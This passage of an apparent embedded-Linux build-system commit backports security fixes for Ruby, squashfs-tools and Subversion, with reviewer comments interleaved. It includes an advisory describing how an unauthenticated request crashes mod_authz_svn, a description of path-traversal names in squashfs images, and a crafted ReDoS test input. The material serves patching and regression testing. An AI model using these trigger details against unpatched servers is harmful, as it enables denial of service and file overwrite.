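+ # seconds. Its default value is 0.
+ #
+ # require 'time'
+diff --git a/test/test_time.rb b/test/test_time.rb
+index ca20788..4f11048 100644
+--- a/test/test_time.rb
++++ b/test/test_time.rb
+@@ -62,6 +62,15 @@ class TestTimeExtension < Test::Unit::TestCase # :nodoc:
+ assert_equal(true, t.utc?)
+ end
+
++ def test_rfc2822_nonlinear
++ pre = ->(n) {"0 Feb 00 00 :00" + " " * n}
++ assert_linear_performance([100, 500, 5000, 50_000], pre: pre) do |s|
++ assert_raise(ArgumentError) do
++ Time.rfc2822(s)
++ end
++ end
++ end
++
+ def test_encode_rfc2822
+ t = Time.utc(1)
+ assert_equal("Mon, 01 Jan 0001 00:00:00 -0000", t.rfc2822)
+--
+2.25.1
+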
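Review bot: The added test_rfc2822_nonlinear calls `assert_linear_performance`, which this patch does not define; if the test library shipped with the 2.7.6 sources lacks that helper, the test errors with NoMethodError instead of exercising the regexp, so a ptest run would say nothing about the fix. Either backport the helper together with the patch or drop the test hunk and say so in the header. The header also carries no description beyond the CVE id; a sentence such as `Time.rfc2822: drop the overlapping \s* before the optional seconds group to avoid quadratic backtracking` would tell a reader what the first lib/time.rb hunk is for. The second lib/time.rb hunk only renames a word in a doc comment and is unrelated to the fix.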
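--- a/meta/recipes-devtools/ruby/ruby_2.7.1.bb
+++ b/meta/recipes-devtools/ruby/ruby_2.7.6.bb
@@ -6,12 +6,17 @@ SRC_URI += " \
  file://remove_has_include_macros.patch \
  file://run-ptest \
  file://0001-Modify-shebang-of-libexec-y2racc-and-libexec-racc2y.patch \
- file://CVE-2020-25613.patch \
  file://0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch \
+ file://CVE-2023-28756.patch \
+ file://CVE-2021-33621.patch \
  "
 
-SRC_URI[md5sum] = "debb9c325bf65021214451660f46e909"
-SRC_URI[sha256sum] = "d418483bdd0000576c1370571121a6eb24582116db0b7bb2005e90e250eae418"
+SRC_URI[md5sum] = "f972fb0cce662966bec10d5c5f32d042"
+SRC_URI[sha256sum] = "e7203b0cc09442ed2c08936d483f8ac140ec1c72e37bb5c401646b7866cb5d10"
+
+# CVE-2021-28966 is Windows specific and not affects Linux OS
+# https://security-tracker.debian.org/tracker/CVE-2021-28966
+CVE_CHECK_WHITELIST += "CVE-2021-28966"
 
 PACKAGECONFIG ??= ""
 PACKAGECONFIG += "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}"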
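--- a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
@@ -72,12 +72,12 @@ exec_postinst_scriptlets() {
  else
  echo "ERROR: postinst $i failed."
  [ "$POSTINST_LOGGING" = "1" ] && eval echo "ERROR: postinst $i failed." $append_log
- remove_pi_dir=0
+ remove_rcsd_link=0
  fi
  done
 }
 
-remove_pi_dir=1
+remove_rcsd_link=1
 if $pm_installed; then
  case $pm in
  "ipk")
@@ -92,9 +92,7 @@ else
  exec_postinst_scriptlets
 fi
 
-# since all postinstalls executed successfully, remove the postinstalls directory
-# and the rcS.d link
-if [ $remove_pi_dir = 1 ]; then
- rm -rf $pi_dir
+# since all postinstalls executed successfully, remove the rcS.d link
+if [ $remove_rcsd_link = 1 ]; then
  remove_rcsd_link
 fi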
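Review bot: The flag variable is renamed to `remove_rcsd_link`, the same name as the function called one line below the test in the second hunk; the shell keeps variables and functions in separate namespaces so it runs, but the guard reads as if it tested the function. A distinct name such as `do_remove_rcsd_link=1` (cleared to 0 on failure in exec_postinst_scriptlets) with a quoted test, `if [ "$do_remove_rcsd_link" = 1 ]; then`, would be clearer and would not break if the value were ever empty. The `rm -rf $pi_dir` is dropped without a comment saying why the scriptlet directory is now kept after a successful run; one line above the guard stating the reason would help the next maintainer. exec_postinst_scriptlets starts outside the first hunk.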
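--- a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
@@ -1,7 +1,7 @@
 [Unit]
 Description=Run pending postinsts
 DefaultDependencies=no
-After=systemd-remount-fs.service systemd-tmpfiles-setup.service tmp.mount
+After=systemd-remount-fs.service systemd-tmpfiles-setup.service tmp.mount ldconfig.service
 Before=sysinit.target
 
 [Service]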
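--- a/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Runs postinstall scripts on first boot of the target device"
+DESCRIPTION = "${SUMMARY}"
 SECTION = "devel"
 PR = "r10"
 LICENSE = "MIT"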
diff --git a/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch
new file mode 100644
index 0000000000..95e2534ee4
--- /dev/null
+++ b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch
@@ -0,0 +1,253 @@
1Backport patch to fix CVE-2021-40153, and remove version update in unsquashfs.c
2for compatible.
3
4Upstream-Status: Backport [https://github.com/plougher/squashfs-tools/commit/79b5a55]
5CVE: CVE-2021-40153
6
7Signed-off-by: Kai Kang <kai.kang@windriver.com>
8
9From 79b5a555058eef4e1e7ff220c344d39f8cd09646 Mon Sep 17 00:00:00 2001
10From: Phillip Lougher <phillip@squashfs.org.uk>
11Date: Sat, 16 Jan 2021 20:08:55 +0000
12Subject: [PATCH] Unsquashfs: fix write outside destination directory exploit
13
14An issue on Github (https://github.com/plougher/squashfs-tools/issues/72)
15shows how some specially crafted Squashfs filesystems containing
16invalid file names (with '/' and ..) can cause Unsquashfs to write
17files outside of the destination directory.
18
19This commit fixes this exploit by checking all names for
20validity.
21
22In doing so I have also added checks for '.' and for names that
23are shorter than they should be (names in the file system should
24not have '\0' terminators).
25
26Signed-off-by: Phillip Lougher <phillip@squashfs.org.uk>
27---
28 squashfs-tools/Makefile | 5 ++-
29 squashfs-tools/unsquash-1.c | 9 +++++-
30 squashfs-tools/unsquash-1234.c | 58 ++++++++++++++++++++++++++++++++++
31 squashfs-tools/unsquash-2.c | 9 +++++-
32 squashfs-tools/unsquash-3.c | 9 +++++-
33 squashfs-tools/unsquash-4.c | 9 +++++-
34 squashfs-tools/unsquashfs.h | 5 ++-
35 7 files changed, 98 insertions(+), 6 deletions(-)
36 create mode 100644 squashfs-tools/unsquash-1234.c
37
38diff --git a/squashfs-tools/Makefile b/squashfs-tools/Makefile
39index aee4b960..20feaca2 100644
40--- a/squashfs-tools/Makefile
41+++ b/squashfs-tools/Makefile
42@@ -156,7 +156,8 @@ MKSQUASHFS_OBJS = mksquashfs.o read_fs.o action.o swap.o pseudo.o compressor.o \
43 caches-queues-lists.o
44
45 UNSQUASHFS_OBJS = unsquashfs.o unsquash-1.o unsquash-2.o unsquash-3.o \
46- unsquash-4.o unsquash-123.o unsquash-34.o swap.o compressor.o unsquashfs_info.o
47+ unsquash-4.o unsquash-123.o unsquash-34.o unsquash-1234.o swap.o \
48+ compressor.o unsquashfs_info.o
49
50 CFLAGS ?= -O2
51 CFLAGS += $(EXTRA_CFLAGS) $(INCLUDEDIR) -D_FILE_OFFSET_BITS=64 \
52@@ -350,6 +351,8 @@ unsquash-123.o: unsquashfs.h unsquash-123.c squashfs_fs.h squashfs_compat.h
53
54 unsquash-34.o: unsquashfs.h unsquash-34.c
55
56+unsquash-1234.o: unsquash-1234.c
57+
58 unsquashfs_xattr.o: unsquashfs_xattr.c unsquashfs.h squashfs_fs.h xattr.h
59
60 unsquashfs_info.o: unsquashfs.h squashfs_fs.h
61diff --git a/squashfs-tools/unsquash-1.c b/squashfs-tools/unsquash-1.c
62index 34eced36..28326cb1 100644
63--- a/squashfs-tools/unsquash-1.c
64+++ b/squashfs-tools/unsquash-1.c
65@@ -2,7 +2,7 @@
66 * Unsquash a squashfs filesystem. This is a highly compressed read only
67 * filesystem.
68 *
69- * Copyright (c) 2009, 2010, 2011, 2012, 2019
70+ * Copyright (c) 2009, 2010, 2011, 2012, 2019, 2021
71 * Phillip Lougher <phillip@squashfs.org.uk>
72 *
73 * This program is free software; you can redistribute it and/or
74@@ -285,6 +285,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
75 memcpy(dire->name, directory_table + bytes,
76 dire->size + 1);
77 dire->name[dire->size + 1] = '\0';
78+
79+ /* check name for invalid characters (i.e /, ., ..) */
80+ if(check_name(dire->name, dire->size + 1) == FALSE) {
81+ ERROR("File system corrupted: invalid characters in name\n");
82+ goto corrupted;
83+ }
84+
85 TRACE("squashfs_opendir: directory entry %s, inode "
86 "%d:%d, type %d\n", dire->name,
87 dirh.start_block, dire->offset, dire->type);
88diff --git a/squashfs-tools/unsquash-1234.c b/squashfs-tools/unsquash-1234.c
89new file mode 100644
90index 00000000..c2d4f42b
91--- /dev/null
92+++ b/squashfs-tools/unsquash-1234.c
93@@ -0,0 +1,58 @@
94+/*
95+ * Unsquash a squashfs filesystem. This is a highly compressed read only
96+ * filesystem.
97+ *
98+ * Copyright (c) 2021
99+ * Phillip Lougher <phillip@squashfs.org.uk>
100+ *
101+ * This program is free software; you can redistribute it and/or
102+ * modify it under the terms of the GNU General Public License
103+ * as published by the Free Software Foundation; either version 2,
104+ * or (at your option) any later version.
105+ *
106+ * This program is distributed in the hope that it will be useful,
107+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
108+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
109+ * GNU General Public License for more details.
110+ *
111+ * You should have received a copy of the GNU General Public License
112+ * along with this program; if not, write to the Free Software
113+ * Foundation, 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
114+ *
115+ * unsquash-1234.c
116+ *
117+ * Helper functions used by unsquash-1, unsquash-2, unsquash-3 and
118+ * unsquash-4.
119+ */
120+
121+#define TRUE 1
122+#define FALSE 0
123+/*
124+ * Check name for validity, name should not
125+ * - be ".", "./", or
126+ * - be "..", "../" or
127+ * - have a "/" anywhere in the name, or
128+ * - be shorter than the expected size
129+ */
130+int check_name(char *name, int size)
131+{
132+ char *start = name;
133+
134+ if(name[0] == '.') {
135+ if(name[1] == '.')
136+ name++;
137+ if(name[1] == '/' || name[1] == '\0')
138+ return FALSE;
139+ }
140+
141+ while(name[0] != '/' && name[0] != '\0')
142+ name ++;
143+
144+ if(name[0] == '/')
145+ return FALSE;
146+
147+ if((name - start) != size)
148+ return FALSE;
149+
150+ return TRUE;
151+}
152diff --git a/squashfs-tools/unsquash-2.c b/squashfs-tools/unsquash-2.c
153index 4b3d767e..474064e1 100644
154--- a/squashfs-tools/unsquash-2.c
155+++ b/squashfs-tools/unsquash-2.c
156@@ -2,7 +2,7 @@
157 * Unsquash a squashfs filesystem. This is a highly compressed read only
158 * filesystem.
159 *
160- * Copyright (c) 2009, 2010, 2013, 2019
161+ * Copyright (c) 2009, 2010, 2013, 2019, 2021
162 * Phillip Lougher <phillip@squashfs.org.uk>
163 *
164 * This program is free software; you can redistribute it and/or
165@@ -386,6 +386,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
166 memcpy(dire->name, directory_table + bytes,
167 dire->size + 1);
168 dire->name[dire->size + 1] = '\0';
169+
170+ /* check name for invalid characters (i.e /, ., ..) */
171+ if(check_name(dire->name, dire->size + 1) == FALSE) {
172+ ERROR("File system corrupted: invalid characters in name\n");
173+ goto corrupted;
174+ }
175+
176 TRACE("squashfs_opendir: directory entry %s, inode "
177 "%d:%d, type %d\n", dire->name,
178 dirh.start_block, dire->offset, dire->type);
179diff --git a/squashfs-tools/unsquash-3.c b/squashfs-tools/unsquash-3.c
180index 02c31fc5..65cfe4d9 100644
181--- a/squashfs-tools/unsquash-3.c
182+++ b/squashfs-tools/unsquash-3.c
183@@ -2,7 +2,7 @@
184 * Unsquash a squashfs filesystem. This is a highly compressed read only
185 * filesystem.
186 *
187- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019
188+ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021
189 * Phillip Lougher <phillip@squashfs.org.uk>
190 *
191 * This program is free software; you can redistribute it and/or
192@@ -413,6 +413,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
193 memcpy(dire->name, directory_table + bytes,
194 dire->size + 1);
195 dire->name[dire->size + 1] = '\0';
196+
197+ /* check name for invalid characters (i.e /, ., ..) */
198+ if(check_name(dire->name, dire->size + 1) == FALSE) {
199+ ERROR("File system corrupted: invalid characters in name\n");
200+ goto corrupted;
201+ }
202+
203 TRACE("squashfs_opendir: directory entry %s, inode "
204 "%d:%d, type %d\n", dire->name,
205 dirh.start_block, dire->offset, dire->type);
206diff --git a/squashfs-tools/unsquash-4.c b/squashfs-tools/unsquash-4.c
207index 8475835c..aa23a841 100644
208--- a/squashfs-tools/unsquash-4.c
209+++ b/squashfs-tools/unsquash-4.c
210@@ -2,7 +2,7 @@
211 * Unsquash a squashfs filesystem. This is a highly compressed read only
212 * filesystem.
213 *
214- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019
215+ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021
216 * Phillip Lougher <phillip@squashfs.org.uk>
217 *
218 * This program is free software; you can redistribute it and/or
219@@ -349,6 +349,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
220 memcpy(dire->name, directory_table + bytes,
221 dire->size + 1);
222 dire->name[dire->size + 1] = '\0';
223+
224+ /* check name for invalid characters (i.e /, ., ..) */
225+ if(check_name(dire->name, dire->size + 1) == FALSE) {
226+ ERROR("File system corrupted: invalid characters in name\n");
227+ goto corrupted;
228+ }
229+
230 TRACE("squashfs_opendir: directory entry %s, inode "
231 "%d:%d, type %d\n", dire->name,
232 dirh.start_block, dire->offset, dire->type);
233diff --git a/squashfs-tools/unsquashfs.h b/squashfs-tools/unsquashfs.h
234index 934618b2..db1da7a0 100644
235--- a/squashfs-tools/unsquashfs.h
236+++ b/squashfs-tools/unsquashfs.h
237@@ -4,7 +4,7 @@
238 * Unsquash a squashfs filesystem. This is a highly compressed read only
239 * filesystem.
240 *
241- * Copyright (c) 2009, 2010, 2013, 2014, 2019
242+ * Copyright (c) 2009, 2010, 2013, 2014, 2019, 2021
243 * Phillip Lougher <phillip@squashfs.org.uk>
244 *
245 * This program is free software; you can redistribute it and/or
246@@ -261,4 +261,7 @@ extern int read_ids(int, long long, long long, unsigned int **);
247
248 /* unsquash-34.c */
249 extern long long *alloc_index_table(int);
250+
251+/* unsquash-1234.c */
252+extern int check_name(char *, int);
253 #endif
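Review bot: check_name() in the new unsquash-1234.c scans until it meets '/' or '\0' and never uses `size` as a bound, so it stays inside the buffer only because each squashfs_opendir caller writes `dire->name[dire->size + 1] = '\0'` on the line before the call. Bounding the scan would make the helper safe on its own: `while((name - start) < size && name[0] != '/' && name[0] != '\0')`. The comment above the function should also state that `size` is the expected string length and that `name` must be NUL-terminated by the caller. The same ERROR text, "invalid characters in name", is printed when the name is merely shorter than expected, which may mislead someone triaging a corrupted image.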
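--- a/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
+++ b/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
@@ -1,14 +1,17 @@
 # Note, we can probably remove the lzma option as it has be replaced with xz,
 # and I don't think the kernel supports it any more.
 SUMMARY = "Tools for manipulating SquashFS filesystems"
+HOMEPAGE = "https://github.com/plougher/squashfs-tools"
+DESCRIPTION = "Tools to create and extract Squashfs filesystems."
 SECTION = "base"
 LICENSE = "GPL-2"
 LIC_FILES_CHKSUM = "file://../COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 
 PV = "4.4"
 SRCREV = "52eb4c279cd283ed9802dd1ceb686560b22ffb67"
-SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https \
+SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https;branch=master \
  file://0001-squashfs-tools-fix-build-failure-against-gcc-10.patch;striplevel=2 \
+ file://CVE-2021-40153.patch;striplevel=2 \
 "
 
 S = "${WORKDIR}/git/squashfs-tools"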
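--- a/meta/recipes-devtools/strace/strace_5.5.bb
+++ b/meta/recipes-devtools/strace/strace_5.5.bb
@@ -1,5 +1,6 @@
 SUMMARY = "System call tracing tool"
 HOMEPAGE = "http://strace.io"
+DESCRIPTION = "strace is a diagnostic, debugging and instructional userspace utility for Linux. It is used to monitor and tamper with interactions between processes and the Linux kernel, which include system calls, signal deliveries, and changes of process state."
 SECTION = "console/utils"
 LICENSE = "LGPL-2.1+ & GPL-2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=c756d9d5dabc27663df64f0bf492166c"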
diff --git a/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch b/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch
new file mode 100644
index 0000000000..5bebde2a86
--- /dev/null
+++ b/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch
@@ -0,0 +1,117 @@
1Upstream-Status: Backport [ https://subversion.apache.org/security/CVE-2020-17525-advisory.txt ]
2CVE: CVE-2020-17525
3Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
4
5 Remote unauthenticated denial-of-service in Subversion mod_authz_svn.
6
7Summary:
8========
9
10 Subversion's mod_authz_svn module will crash if the server is using
11 in-repository authz rules with the AuthzSVNReposRelativeAccessFile
12 option and a client sends a request for a non-existing repository URL.
13
14 This can lead to disruption for users of the service.
15
16Known vulnerable:
17=================
18
19 mod_dav_svn+mod_authz_svn servers 1.9.0 through 1.10.6 (inclusive).
20 mod_dav_svn+mod_authz_svn servers 1.11.0 through 1.14.0 (inclusive).
21
22Known fixed:
23============
24
25 mod_dav_svn+mod_authz_svn servers 1.14.1
26 mod_dav_svn+mod_authz_svn servers 1.10.7
27
28Details:
29========
30
31 A null-pointer-dereference has been found in mod_authz_svn that results in
32 a remote unauthenticated Denial-of-Service in some server configurations.
33
34 The vulnerability can be triggered by an unauthenticated user if the
35 Apache HTTPD server is configured to use an in-repository authz file,
36 with configuration directives such as:
37
38 AuthzSVNAccessFile "^/authz"
39 AuthzSVNReposRelativeAccessFile "^/authz"
40
41 The problem originates when sending a GET request to a non-existent
42 repository. The mod_authz_svn module will attempt to find authz rules
43 at a path within the requested SVN repository. Upon constructing this
44 path, the function svn_repos_find_root_path will return a NULL pointer
45 since the requested repository does not exist on-disk.
46 A check for this legitimate NULL pointer condition is missing, which
47 results in a segmentation fault when the NULL pointer is used.
48
49 The in-repository authz feature was first introduced in Subversion 1.8:
50 https://subversion.apache.org/docs/release-notes/1.8.html#in-repo-authz
51
52 The missing NULL check was first introduced during refactoring of the
53 authz code during development work leading up to Subversion 1.9.
54 Subversion 1.8 servers are unaffected.
55
56Severity:
57=========
58
59 CVSSv3 Base Score: 7.5 (High)
60
61 CVSSv3 Base Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
62
63 Exploitation results in denial of service by crashing the HTTPD worker
64 handling the request. The impact of this differs depending on how the
65 Apache HTTPD server is configured, including the choice of MPM (Multi-
66 Processing-Module). If the worker shares its memory address space with
67 the main thread, as is the case with e.g. the Event MPM, the entire
68 HTTPD server process will terminate. If the pre-fork MPM is used, the
69 worker will terminate but the HTTPD server will stay up, and service
70 availability will depend on how frequently the attacker is able to
71 send malicious requests which target the vulnerability.
72
73Recommendations:
74================
75
76 We recommend all users to upgrade to a known fixed release of the
77 Subversion mod_dav_svn server.
78
79 Users who are unable to upgrade may apply the included patches.
80
81 As a workaround, the use of in-repository authz rules files with
82 the AuthzSVNReposRelativeAccessFile can be avoided by switching
83 to an alternative configuration which fetches an authz rules file
84 from the server's filesystem, rather than from an SVN repository.
85
86References:
87===========
88
89 CVE-2020-17525 (Subversion)
90
91Reported by:
92============
93
94 Thomas Åkesson, simonsoft.se
95
96Patches:
97========
98
99 Patch for Subversion 1.10, 1.14:
100
101[[[
102Index: subversion/libsvn_repos/config_file.c
103===================================================================
104--- a/subversion/libsvn_repos/config_file.c (revision 1883994)
105+++ b/subversion/libsvn_repos/config_file.c (working copy)
106@@ -237,6 +237,10 @@ get_repos_config(svn_stream_t **stream,
107 {
108 /* Search for a repository in the full path. */
109 repos_root_dirent = svn_repos_find_root_path(dirent, scratch_pool);
110+ if (repos_root_dirent == NULL)
111+ return svn_error_trace(handle_missing_file(stream, checksum, access,
112+ url, must_exist,
113+ svn_node_none));
114
115 /* Attempt to open a repository at repos_root_dirent. */
116 SVN_ERR(svn_repos_open3(&access->repos, repos_root_dirent, NULL,
117]]]
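Review bot: The embedded advisory labels this hunk "Patch for Subversion 1.10, 1.14", while the recipe that applies it in this commit is subversion_1.13.0.bb, and the patch header does not record that the hunk was checked against 1.13.0. A header line such as `Applies unchanged to 1.13.0 (inside the advisory's vulnerable range 1.11.0 through 1.14.0)` would document that, assuming it was verified. The added NULL check sits inside get_repos_config, whose body starts and ends outside the hunk, so whether `handle_missing_file` takes the same arguments in 1.13.0 cannot be confirmed from here. No regression test for a request to a non-existent repository accompanies the fix.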
diff --git a/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch b/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch
new file mode 100644
index 0000000000..030ead6c66
--- /dev/null
+++ b/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch
@@ -0,0 +1,146 @@
1From 61382fd8ea66000bd9ee8e203a6eab443220ee40 Mon Sep 17 00:00:00 2001
2From: Nathan Hartman <hartmannathan@apache.org>
3Date: Sun, 27 Mar 2022 05:59:18 +0000
4Subject: [PATCH] On the 1.14.x-r1899227 branch: Merge r1899227 from trunk
5 w/testlist variation
6
7git-svn-id: https://svn.apache.org/repos/asf/subversion/branches/1.14.x-r1899227@1899229 13f79535-47bb-0310-9956-ffa450edef68
8
9CVE: CVE-2021-28544 [https://github.com/apache/subversion/commit/61382fd8ea66000bd9ee8e203a6eab443220ee40]
10Upstream-Status: Backport
11Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
12---
13 subversion/libsvn_repos/log.c | 26 +++++-------
14 subversion/tests/cmdline/authz_tests.py | 55 +++++++++++++++++++++++++
15 2 files changed, 65 insertions(+), 16 deletions(-)
16
17diff --git a/subversion/libsvn_repos/log.c b/subversion/libsvn_repos/log.c
18index d9a1fb1085e16..41ca8aed27174 100644
19--- a/subversion/libsvn_repos/log.c
20+++ b/subversion/libsvn_repos/log.c
21@@ -337,42 +337,36 @@ detect_changed(svn_repos_revision_access_level_t *access_level,
22 if ( (change->change_kind == svn_fs_path_change_add)
23 || (change->change_kind == svn_fs_path_change_replace))
24 {
25- const char *copyfrom_path = change->copyfrom_path;
26- svn_revnum_t copyfrom_rev = change->copyfrom_rev;
27-
28 /* the following is a potentially expensive operation since on FSFS
29 we will follow the DAG from ROOT to PATH and that requires
30 actually reading the directories along the way. */
31 if (!change->copyfrom_known)
32 {
33- SVN_ERR(svn_fs_copied_from(&copyfrom_rev, &copyfrom_path,
34+ SVN_ERR(svn_fs_copied_from(&change->copyfrom_rev, &change->copyfrom_path,
35 root, path, iterpool));
36 change->copyfrom_known = TRUE;
37 }
38
39- if (copyfrom_path && SVN_IS_VALID_REVNUM(copyfrom_rev))
40+ if (change->copyfrom_path && SVN_IS_VALID_REVNUM(change->copyfrom_rev))
41 {
42- svn_boolean_t readable = TRUE;
43-
44 if (callbacks->authz_read_func)
45 {
46 svn_fs_root_t *copyfrom_root;
47+ svn_boolean_t readable;
48
49 SVN_ERR(svn_fs_revision_root(&copyfrom_root, fs,
50- copyfrom_rev, iterpool));
51+ change->copyfrom_rev, iterpool));
52 SVN_ERR(callbacks->authz_read_func(&readable,
53 copyfrom_root,
54- copyfrom_path,
55+ change->copyfrom_path,
56 callbacks->authz_read_baton,
57 iterpool));
58 if (! readable)
59- found_unreadable = TRUE;
60- }
61-
62- if (readable)
63- {
64- change->copyfrom_path = copyfrom_path;
65- change->copyfrom_rev = copyfrom_rev;
66+ {
67+ found_unreadable = TRUE;
68+ change->copyfrom_path = NULL;
69+ change->copyfrom_rev = SVN_INVALID_REVNUM;
70+ }
71 }
72 }
73 }
74diff --git a/subversion/tests/cmdline/authz_tests.py b/subversion/tests/cmdline/authz_tests.py
75index 760cb3663d02f..92e8a5e1935c9 100755
76--- a/subversion/tests/cmdline/authz_tests.py
77+++ b/subversion/tests/cmdline/authz_tests.py
78@@ -1731,6 +1731,60 @@ def empty_group(sbox):
79 '--username', svntest.main.wc_author,
80 sbox.repo_url)
81
82+@Skip(svntest.main.is_ra_type_file)
83+def log_inaccessible_copyfrom(sbox):
84+ "log doesn't leak inaccessible copyfrom paths"
85+
86+ sbox.build(empty=True)
87+ sbox.simple_add_text('secret', 'private')
88+ sbox.simple_commit(message='log message for r1')
89+ sbox.simple_copy('private', 'public')
90+ sbox.simple_commit(message='log message for r2')
91+
92+ svntest.actions.enable_revprop_changes(sbox.repo_dir)
93+ # Remove svn:date and svn:author for predictable output.
94+ svntest.actions.run_and_verify_svn(None, [], 'propdel', '--revprop',
95+ '-r2', 'svn:date', sbox.repo_url)
96+ svntest.actions.run_and_verify_svn(None, [], 'propdel', '--revprop',
97+ '-r2', 'svn:author', sbox.repo_url)
98+
99+ write_restrictive_svnserve_conf(sbox.repo_dir)
100+
101+ # First test with blanket access.
102+ write_authz_file(sbox,
103+ {"/" : "* = rw"})
104+ expected_output = svntest.verify.ExpectedOutput([
105+ "------------------------------------------------------------------------\n",
106+ "r2 | (no author) | (no date) | 1 line\n",
107+ "Changed paths:\n",
108+ " A /public (from /private:1)\n",
109+ "\n",
110+ "log message for r2\n",
111+ "------------------------------------------------------------------------\n",
112+ ])
113+ svntest.actions.run_and_verify_svn(expected_output, [],
114+ 'log', '-r2', '-v',
115+ sbox.repo_url)
116+
117+ # Now test with an inaccessible copy source (/private).
118+ write_authz_file(sbox,
119+ {"/" : "* = rw"},
120+ {"/private" : "* ="})
121+ expected_output = svntest.verify.ExpectedOutput([
122+ "------------------------------------------------------------------------\n",
123+ "r2 | (no author) | (no date) | 1 line\n",
124+ "Changed paths:\n",
125+ # The copy is shown as a plain add with no copyfrom info.
126+ " A /public\n",
127+ "\n",
128+ # No log message, as the revision is only partially visible.
129+ "\n",
130+ "------------------------------------------------------------------------\n",
131+ ])
132+ svntest.actions.run_and_verify_svn(expected_output, [],
133+ 'log', '-r2', '-v',
134+ sbox.repo_url)
135+
136
137 ########################################################################
138 # Run the tests
139@@ -1771,6 +1825,7 @@ def empty_group(sbox):
140 inverted_group_membership,
141 group_member_empty_string,
142 empty_group,
143+ log_inaccessible_copyfrom,
144 ]
145 serial_only = True
146
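Review bot: In the log.c hunk `svn_boolean_t readable;` is now declared without an initial value (the removed code started it at TRUE), so the `if (! readable)` test depends on `callbacks->authz_read_func` always writing its out-parameter before it returns success. Initialising it fail-closed, `svn_boolean_t readable = FALSE;`, would make a callback that leaves it unset hide the copyfrom fields rather than expose them. detect_changed starts and ends outside the hunk. Separately, the header puts the upstream URL on the `CVE:` line and leaves `Upstream-Status: Backport` bare, whereas the CVE-2023-28756 patch in this commit uses `Upstream-Status: Backport [URL]`.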
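--- a/meta/recipes-devtools/subversion/subversion_1.13.0.bb
+++ b/meta/recipes-devtools/subversion/subversion_1.13.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Subversion (svn) version control system client"
 HOMEPAGE = "http://subversion.apache.org"
+DESCRIPTION = "Subversion is an open source version control system."
 SECTION = "console/network"
 LICENSE = "Apache-2 & MIT"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=6487ae7094d359fa90fb9c4096e52e2b"
@@ -11,6 +12,8 @@ SRC_URI = "${APACHE_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
  file://disable_macos.patch \
  file://0001-Fix-libtool-name-in-configure.ac.patch \
  file://serfmacro.patch \
+ file://CVE-2020-17525.patch \
+ file://CVE-2021-28544.patch \
  "
 
 SRC_URI[md5sum] = "3004b4dae18bf45a0b6ea4ef8820064d"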
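--- /dev/null
+++ b/meta/recipes-devtools/swig/swig/determinism.patch
@@ -0,0 +1,19 @@
+Remove the compiler commandline/platform from the compiled binary as this
+breaks reproducibilty.
+
+Upstream-Status: Inappropriate [OE reproducibiity fix upstream unlikely to take]
+RP 2021/3/1
+
+
+Index: swig-3.0.12/Source/Modules/main.cxx
+===================================================================
+--- swig-3.0.12.orig/Source/Modules/main.cxx
++++ swig-3.0.12/Source/Modules/main.cxx
+@@ -636,7 +636,6 @@ void SWIG_getoptions(int argc, char *arg
+ }
+ } else if (strcmp(argv[i], "-version") == 0) {
+ fprintf(stdout, "\nSWIG Version %s\n", Swig_package_version());
+- fprintf(stdout, "\nCompiled with %s [%s]\n", SWIG_CXX, SWIG_PLATFORM);
+ fprintf(stdout, "\nConfigured options: %cpcre\n",
+ #ifdef HAVE_PCRE
+ '+'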
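--- a/meta/recipes-devtools/swig/swig_3.0.12.bb
+++ b/meta/recipes-devtools/swig/swig_3.0.12.bb
@@ -6,6 +6,7 @@ SRC_URI += "file://0001-Use-proc-self-exe-for-swig-swiglib-on-non-Win32-plat.pat
  file://swig-3.0.12-Coverity-fix-issue-reported-for-SWIG_Python_FixMetho.patch \
  file://Python-Fix-new-GCC8-warnings-in-generated-code.patch \
  file://0001-Fix-generated-code-for-constant-expressions-containi.patch \
+ file://determinism.patch \
  "
 SRC_URI[md5sum] = "82133dfa7bba75ff9ad98a7046be687c"
 SRC_URI[sha256sum] = "7cf9f447ae7ed1c51722efc45e7f14418d15d7a1e143ac9f09a668999f4fc94d"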
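--- /dev/null
+++ b/meta/recipes-devtools/syslinux/syslinux/determinism.patch
@@ -0,0 +1,22 @@
+In order to build deterministic binaries, we need to sort the wildcard expansion
+so the libraries are linked in the same order each time. This fixes reproducibility
+issues within syslinux builds.
+
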